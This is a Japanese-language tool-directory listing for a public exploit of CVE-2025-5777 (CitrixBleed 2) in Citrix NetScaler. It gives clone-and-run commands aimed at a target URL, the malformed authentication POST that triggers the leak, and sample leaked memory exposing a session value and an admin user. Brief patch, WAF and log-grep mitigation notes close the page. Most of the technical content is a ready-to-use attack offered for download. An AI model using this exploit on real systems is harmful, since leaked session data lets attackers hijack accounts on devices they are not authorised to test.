Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-5777 — CVE-2025-5777 Citrix NetScaler メモリリークエクスプロイト (CitrixBleed 2) | Kitploit
ツール/GitHubGitHub/bughuntar/cve-2025-5777
メモリフォレンジック脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubbughuntar/cve-2025-5777

CVE-2025-5777

CVE-2025-5777 Citrix NetScaler メモリリークエクスプロイト (CitrixBleed 2)

リポジトリを見る
307531年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-5777 - Citrix NetScaler メモリリークエクスプロイト

Banner


📌 概要

このツールは、Citrix NetScaler ADC/Gatewayデバイスにおける重大なメモリ情報漏洩脆弱性であるCVE-2025-5777を実証します。このエクスプロイトは、不正な形式の認証リクエストを介して機密メモリ内容を漏洩させます。

主な機能:
✔ メモリリーク検出 (XML応答解析による)
✔ 漏洩メモリ領域のHex+ASCIIダンプ
✔ Burp Suite互換のリクエスト形式
✔ 効率的なテストのための非同期リクエスト


🔍 概念実証 (PoC)

1. 脆弱性を含むリクエスト (Burp Suite)

Burp Request

2. エクスプロイトの実行

Tool Execution


⚡ クイックスタート

root@kitploit:~
git clone https://github.com/bughuntar/CVE-2025-5777.git
cd CVE-2025-5777
pip install requests beautifulsoup4 aiohttp colorama
chmod +x citrix_memory_leak.py
python3 citrix_memory_leak.py https://target-netscaler.com

期待される出力:

root@kitploit:~
+ [+] Memory leak detected!
--- Leaked Memory Hex Dump ---
00000000  73 65 73 73 69 6F 6E 3D 31 32 33 34 35 36 37 38  session=12345678
00000010  55 73 65 72 3A 20 61 64 6D 69 6E 00 00 00 00 00  User: admin.....

🛡️ 緩和策

対策コマンド/参照
パッチCitrix Security Bulletin
WAFルールBlock POST /p/u/doAuthentication.do with malformed params
検出

📚 リソース

  • NVDエントリ
  • 技術解説

🖥️ コードハイライト

root@kitploit:~
# Malformed request trigger
async def exploit(target):
    async with aiohttp.post(
        f"{target}/p/u/doAuthentication.do",
        data="login",  # Missing equals sign triggers leak
        ssl=False
    ) as response:
        await parse_leak(await response.read())

⚠️ 法的注意事項

root@kitploit:~
- This tool is for authorized testing ONLY.
- Unauthorized use violates international cybersecurity laws.

完全な免責事項: DISCLAIMER.md

著者: Professor the Hunter

ツールをダウンロード
grep 'POST /p/u/doAuthentication.do' netscaler.log